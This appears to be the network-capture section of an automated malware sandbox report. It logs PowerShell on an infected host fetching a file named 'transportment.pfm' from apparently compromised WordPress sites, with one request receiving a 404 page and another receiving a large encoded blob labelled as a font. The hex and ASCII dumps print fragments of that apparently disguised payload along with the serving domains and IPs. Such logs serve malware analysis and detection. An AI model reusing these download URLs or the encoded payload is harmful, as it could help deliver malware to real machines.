2024-07-26 11:03:03 UTC	16384	IN	Data Raw: 74 68 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 63 75 73 74 6f 6d 2d 2d 61 73 74 2d 77 69 64 65 2d 77 69 64 74 68 2d 73 69 7a 65 29 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 5b 61 73 74 2d 62 6c 6f 63 6b 73 2d 6c 61 79 6f 75 74 5d 20 2e 61 6c 69 67 6e 66 75 6c 6c 20 7b 6d 61 78 2d 77 69 64 74 68 3a 20 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 20 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 7d 62 6c 6f 63 6b 71 75 6f 74 65 20 7b 6d 61 72 67 69 6e 3a 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 Data Ascii: th: var(--wp--custom--ast-wide-width-size);}.entry-content[ast-blocks-layout] .alignfull {max-width: none;}.entry-content .wp-block-columns {margin-bottom: 0;}blockquote {margin: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-ri
2024-07-26 11:03:03 UTC	16384	IN	Data Raw: 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 73 69 74 65 2d 63 6f 6e 74 65 6e 74 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 63 68 69 76 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 2d 72 65 73 70 6f 6e 64 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 61 73 74 2d 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: -container .site-content,.ast-separate-container .ast-archive-description,.ast-separate-container .comments-area .comment-respond,.ast-separate-container .comments-area .ast-comment-list li,.ast-separate-container .comments-area .comments-title{background
2024-07-26 11:03:03 UTC	16384	IN	Data Raw: 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 6f 77 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 Data Ascii: ayout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}.is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-i
2024-07-26 11:03:03 UTC	16384	IN	Data Raw: 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 33 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 34 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d Data Ascii: ate-container .ast-grid-2 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-3 .ast-article-post.ast-separate-posts,.ast-separate-container .ast-grid-4 .ast-article-post.ast-separate-posts{border-bottom:0;}.ast-separate-container .ast-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.22	49189	93.113.54.56	443	1812	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:03:08 UTC	71	OUT	GET /os/transportment.pfm HTTP/1.1 Host: asociatiatraditiimaria.ro
2024-07-26 11:03:08 UTC	340	IN	HTTP/1.1 404 Not Found Connection: close expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://asociatiatraditiimaria.ro/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Fri, 26 Jul 2024 11:03:08 GMT server: LiteSpeed
2024-07-26 11:03:08 UTC	1028	IN	Data Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 41 73 6f 63 69 61 c8 9b 69 61 20 54 72 61 64 69 c8 9b 69 69 Data Ascii: 10000<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Page not found – Asociaia Tradiii
2024-07-26 11:03:09 UTC	14994	IN	Data Raw: 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 7d 3b 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b Data Ascii: auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);
2024-07-26 11:03:09 UTC	16384	IN	Data Raw: 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 20 3e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 2e 69 73 2d 73 74 79 6c 65 2d 6f 75 74 6c 69 6e 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3a 68 6f 76 65 72 7b 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 30 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 76 Data Ascii: tyle-outline > .wp-block-button__link:not(.has-text-color):hover,.wp-block-buttons .wp-block-button.wp-block-button__link.is-style-outline:not(.has-text-color):hover{color:var(--ast-global-color-5);background-color:var(--ast-global-color-0);border-color:v
2024-07-26 11:03:09 UTC	16384	IN	Data Raw: 20 31 2e 35 65 6d 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 29 3a 6e 6f 74 28 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 29 20 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 35 29 3b 7d 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 3e 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 62 6c 6f 63 6b 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 20 7b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 35 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c Data Ascii: 1.5em;border-color: rgba(0,0,0,0.05);}.wp-block-quote:not(.has-text-align-right):not(.has-text-align-center) {border-left: 5px solid rgba(0,0,0,0.05);}.has-text-align-right > blockquote,blockquote.has-text-align-right {border-right: 5px solid rgba(0,0,0,
2024-07-26 11:03:09 UTC	16384	IN	Data Raw: 65 6e 74 2d 6c 69 73 74 20 6c 69 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 63 6f 6d 6d 65 6e 74 73 2d 61 72 65 61 20 2e 63 6f 6d 6d 65 6e 74 73 2d 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 76 61 72 28 2d 2d 61 73 74 2d 67 6c 6f 62 61 6c 2d 63 6f 6c 6f 72 2d 35 29 3b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 6e 6f 6e 65 3b 3b 7d 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 39 32 31 70 78 29 7b 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 61 72 74 69 63 6c 65 2d 73 69 6e 67 6c 65 3a 6e 6f 74 28 2e 61 73 74 2d 72 65 6c 61 74 65 64 2d 70 6f 73 74 29 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f Data Ascii: ent-list li,.ast-separate-container .comments-area .comments-title{background-color:var(--ast-global-color-5);;background-image:none;;}@media (max-width:921px){.ast-separate-container .ast-article-single:not(.ast-related-post),.woocommerce.ast-separate-co
2024-07-26 11:03:09 UTC	16384	IN	Data Raw: 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 6c 65 66 74 7b 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 30 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 32 65 6d 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 72 69 67 68 74 7b 66 6c 6f 61 74 3a 20 72 69 67 68 74 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e 74 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e Data Ascii: s-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}.is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}.is-layout-constrained > .aligncenter{margin-left: auto !importan
2024-07-26 11:03:09 UTC	16384	IN	Data Raw: 72 74 69 63 6c 65 2d 70 6f 73 74 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 70 6f 73 74 73 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 3b 7d 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 3e 20 2e 73 69 74 65 2d 6d 61 69 6e 20 3e 20 2e 61 73 74 2d 72 6f 77 3a 62 65 66 6f 72 65 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 32 20 3e 20 2e 73 69 74 65 2d 6d 61 69 6e 20 3e 20 2e 61 73 74 2d 72 6f 77 3a 61 66 74 65 72 2c 2e 61 73 74 2d 73 65 70 61 72 61 74 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 61 73 74 2d 67 72 69 64 2d 33 20 3e 20 2e 73 69 74 65 2d 6d 61 69 6e 20 3e 20 2e 61 73 74 2d 72 6f 77 3a 62 65 66 6f 72 65 2c 2e 61 73 74 2d 73 65 Data Ascii: rticle-post.ast-separate-posts{border-bottom:0;}.ast-separate-container .ast-grid-2 > .site-main > .ast-row:before,.ast-separate-container .ast-grid-2 > .site-main > .ast-row:after,.ast-separate-container .ast-grid-3 > .site-main > .ast-row:before,.ast-se

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.22	49190	34.166.62.190	443	1812	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 11:03:14 UTC	107	OUT	GET /wp-admin/oserve/transportment.pfm HTTP/1.1 Host: new.quranushaiqer.org.sa Connection: Keep-Alive
2024-07-26 11:03:14 UTC	396	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Fri, 26 Jul 2024 11:03:14 GMT Content-Type: application/x-font-type1 Content-Length: 519984 Connection: close Last-Modified: Mon, 08 Jul 2024 02:08:54 GMT ETag: "7ef30-61cb2e520d854" Accept-Ranges: bytes X-Cache: HIT from Backend Strict-Transport-Security: max-age=31536000 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff
2024-07-26 11:03:14 UTC	15988	IN	Data Raw: 32 63 6e 59 77 75 74 45 2b 59 64 53 59 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 53 30 74 4c 54 70 72 77 41 41 41 4e 6e 2f 68 38 6e 72 58 76 71 6a 4a 6b 32 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 57 31 74 62 55 66 4a 64 37 6b 6d 39 76 69 36 30 49 6e 4b 34 56 Data Ascii: 2cnYwutE+YdSYLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTprwAAANn/h8nrXvqjJk21tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbW1tbUfJd7km9vi60InK4V
2024-07-26 11:03:14 UTC	16384	IN	Data Raw: 58 59 62 66 57 6d 54 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 76 37 2b 2f 74 6e 31 32 65 58 72 54 73 55 46 37 30 46 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 58 56 31 64 51 2b 42 74 41 41 41 41 4e 6a 4b 32 65 44 72 54 36 63 Data Ascii: XYbfWmT+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/v7+/tn12eXrTsUF70F1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dXV1dQ+BtAAAANjK2eDrT6c
2024-07-26 11:03:14 UTC	610	IN	Data Raw: 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 35 4f 54 6b 77 2b 42 71 51 41 41 41 4e 6e 4a 32 65 54 72 55 4e 67 63 31 69 47 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 73 37 4f 7a 6d 32 59 50 63 2f 46 57 44 36 37 77 36 30 69 35 36 54 55 35 42 51 55 46 42 51 55 46 42 51 55 46 42 51 55 Data Ascii: k5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTk5OTkw+BqQAAANnJ2eTrUNgc1iGzs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozs7Ozm2YPc/FWD67w60i56TU5BQUFBQUFBQUFBQU
2024-07-26 11:03:14 UTC	16384	IN	Data Raw: 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 66 58 31 39 51 2f 72 33 64 37 49 36 31 76 5a 61 2f 51 4f 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 6d 4a 69 59 67 63 4d 45 41 51 41 41 32 65 34 50 64 75 4c 72 54 66 54 53 65 44 37 4c 79 38 76 4c 79 Data Ascii: X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19Q/r3d7I61vZa/QOmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYgcMEAQAA2e4PduLrTfTSeD7Ly8vLy
2024-07-26 11:03:14 UTC	16384	IN	Data Raw: 33 39 2f 66 33 39 2f 66 33 39 2f 66 33 39 2f 51 2f 36 78 39 76 69 36 30 78 50 2f 34 42 4b 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 46 68 59 57 4f 64 41 50 64 2f 4d 50 66 74 37 72 55 45 59 48 76 30 63 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 48 52 30 64 44 34 56 79 2b 76 2f 2f 6d Data Ascii: 39/f39/f39/f39/Q/6x9vi60xP/4BKFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWOdAPd/MPft7rUEYHv0cdHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dHR0dD4Vy+v//m
2024-07-26 11:03:14 UTC	16384	IN	Data Raw: 74 46 68 30 5a 6c 72 47 57 6e 39 6e 50 56 57 38 70 38 37 54 59 73 78 73 58 31 54 42 42 44 4c 68 54 77 52 72 32 6c 63 78 44 4e 44 75 61 59 2f 6d 78 63 76 34 41 45 63 79 43 65 4f 74 6b 46 39 70 51 6a 75 48 46 66 48 31 47 41 4f 79 4e 35 57 44 62 39 31 51 77 73 4f 71 77 47 55 37 2b 74 33 51 53 57 76 4c 75 32 47 75 6c 70 62 55 65 58 2f 52 63 63 4c 4a 47 41 34 31 5a 33 39 48 50 4e 57 36 65 58 48 71 6d 69 4e 64 2b 71 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 45 36 35 30 38 39 4a 76 52 2f 73 43 4c 4b 32 59 65 43 72 31 30 49 77 69 38 61 69 6a 46 65 44 71 71 2f 6e 58 74 30 79 36 7a 79 34 63 55 37 36 64 4b 4e 79 2f 30 6d 54 71 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 66 36 33 79 34 58 2b 74 38 75 46 2f 72 66 4c 68 4a Data Ascii: tFh0ZlrGWn9nPVW8p87TYsxsX1TBBDLhTwRr2lcxDNDuaY/mxcv4AEcyCeOtkF9pQjuHFfH1GAOyN5WDb91QwsOqwGU7+t3QSWvLu2GulpbUeX/RccLJGA41Z39HPNW6eXHqmiNd+qrfLhf63y4X+t8uF/rfLhf63y4X+t8uE65089JvR/sCLK2YeCr10Iwi8aijFeDqq/nXt0y6zy4cU76dKNy/0mTq3y4X+t8uF/rfLhf63y4X+t8uF/rfLhJ
2024-07-26 11:03:14 UTC	16384	IN	Data Raw: 51 69 59 49 77 69 70 52 53 6b 2f 45 76 77 74 4c 63 49 59 4a 59 59 30 53 53 55 4c 41 50 53 51 4a 32 6c 59 49 34 63 37 62 5a 4c 4c 44 50 44 42 6d 42 67 73 2b 4d 6b 45 4f 42 31 4d 48 63 76 42 72 36 30 37 77 34 33 66 55 31 55 4d 4d 46 46 46 73 71 5a 6d 57 50 4c 51 53 39 71 62 77 67 30 44 6f 36 37 70 52 45 65 75 45 62 65 37 6e 42 79 56 50 51 41 2f 73 72 69 68 46 49 4d 70 4a 47 54 6a 53 30 78 6e 2f 70 76 71 47 43 47 4e 68 73 79 56 2f 54 4c 4f 66 51 77 4f 4f 42 2f 72 66 31 6b 6d 36 76 79 34 62 4d 55 78 74 69 38 38 46 70 72 2b 67 39 6a 46 54 73 67 64 39 57 61 6b 42 4c 6b 68 72 76 6e 73 74 73 44 4f 72 43 76 36 6a 51 52 45 76 35 4a 55 34 63 76 52 6d 43 4d 55 61 77 4a 52 53 77 5a 72 39 72 48 66 4c 44 6a 4a 42 50 6f 5a 6a 42 33 4a 67 4f 67 61 79 32 73 69 30 49 48 56 Data Ascii: 